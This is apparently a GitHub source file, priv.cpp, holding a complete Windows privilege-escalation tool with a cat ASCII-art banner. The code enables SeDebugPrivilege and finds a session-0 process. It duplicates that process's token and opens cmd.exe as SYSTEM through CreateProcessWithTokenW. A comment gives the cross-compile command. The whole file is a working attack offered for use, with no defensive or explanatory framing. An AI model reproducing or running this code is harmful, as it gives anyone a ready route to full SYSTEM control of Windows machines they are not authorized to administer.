-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathpriv.cpp
More file actions
121 lines (105 loc) · 4 KB
/
priv.cpp
File metadata and controls
121 lines (105 loc) · 4 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
#include <windows.h>
#include <iostream>
#include <tlhelp32.h>
/*
To compile on Linux an exe (lol)
x86_64-w64-mingw32-g++ -static-libgcc -static-libstdc++ priv.cpp -o priv.exe
Sets SE_DEBUG on self for dumping of procs.
Picks SYSTEM token. (0)
Snapshot + dump token.
Clones it.
Opens new proc with it.
*/
// Function to display ASCII art of a cat
void displayCatArt() {
std::cout << "\n\n";
std::cout << " _._ _,-'\"\"`-._\n";
std::cout << "(,-.`._,'( |\\`-/|\n";
std::cout << " `-.-' \\ )-`( , o o)\n";
std::cout << " `- \\`_`\"'-\n\n";
std::cout << " Meow.\n";
std::cout << "https://afflicted.sh/\n";
std::cout << "Written by: _SiCk\n\n";
}
int main() {
// Display cat art and info
displayCatArt();
// Enable debug privilege
HANDLE hToken;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
std::cerr << "OpenProcessToken failed: " << GetLastError() << std::endl;
return 0;
}
TOKEN_PRIVILEGES tk;
tk.PrivilegeCount = 1;
tk.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!LookupPrivilegeValue(nullptr, SE_DEBUG_NAME, &tk.Privileges[0].Luid)) {
std::cerr << "LookupPrivilegeValue failed: " << GetLastError() << std::endl;
CloseHandle(hToken);
return 0;
}
if (!AdjustTokenPrivileges(hToken, FALSE, &tk, 0, nullptr, nullptr)) {
std::cerr << "AdjustTokenPrivileges failed: " << GetLastError() << std::endl;
CloseHandle(hToken);
return 0;
}
CloseHandle(hToken);
// Find a suitable target process
HANDLE process_handle = nullptr;
DWORD pid = 0;
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (snapshot != INVALID_HANDLE_VALUE) {
PROCESSENTRY32 processEntry;
processEntry.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(snapshot, &processEntry)) {
do {
// Check if the process is running in session 0 (SYSTEM session)
DWORD sessionID;
if (ProcessIdToSessionId(processEntry.th32ProcessID, &sessionID) && sessionID == 0) {
pid = processEntry.th32ProcessID;
process_handle = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
if (process_handle) {
break;
}
}
} while (Process32Next(snapshot, &processEntry));
}
CloseHandle(snapshot);
}
if (!process_handle) {
std::cerr << "Failed to open target process: " << GetLastError() << std::endl;
return 0;
}
// Get the process token
HANDLE process_token = nullptr;
if (!OpenProcessToken(process_handle, TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &process_token)) {
std::cerr << "Failed to open process token: " << GetLastError() << std::endl;
CloseHandle(process_handle);
return 0;
}
// Duplicate the process token
HANDLE new_token = nullptr;
if (!DuplicateTokenEx(process_token, MAXIMUM_ALLOWED, nullptr, SecurityImpersonation, TokenPrimary, &new_token)) {
std::cerr << "Failed to duplicate token: " << GetLastError() << std::endl;
CloseHandle(process_token);
CloseHandle(process_handle);
return 0;
}
// Start the command prompt with the new token
STARTUPINFOW si = { sizeof(STARTUPINFOW) };
PROCESS_INFORMATION pi = { 0 };
if (!CreateProcessWithTokenW(new_token, LOGON_WITH_PROFILE, nullptr, L"cmd.exe", CREATE_NEW_CONSOLE, nullptr, nullptr, &si, &pi)) {
std::cerr << "CreateProcessWithTokenW failed: " << GetLastError() << std::endl;
CloseHandle(new_token);
CloseHandle(process_token);
CloseHandle(process_handle);
return 0;
}
// Clean up
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
CloseHandle(new_token);
CloseHandle(process_token);
CloseHandle(process_handle);
return 0;
}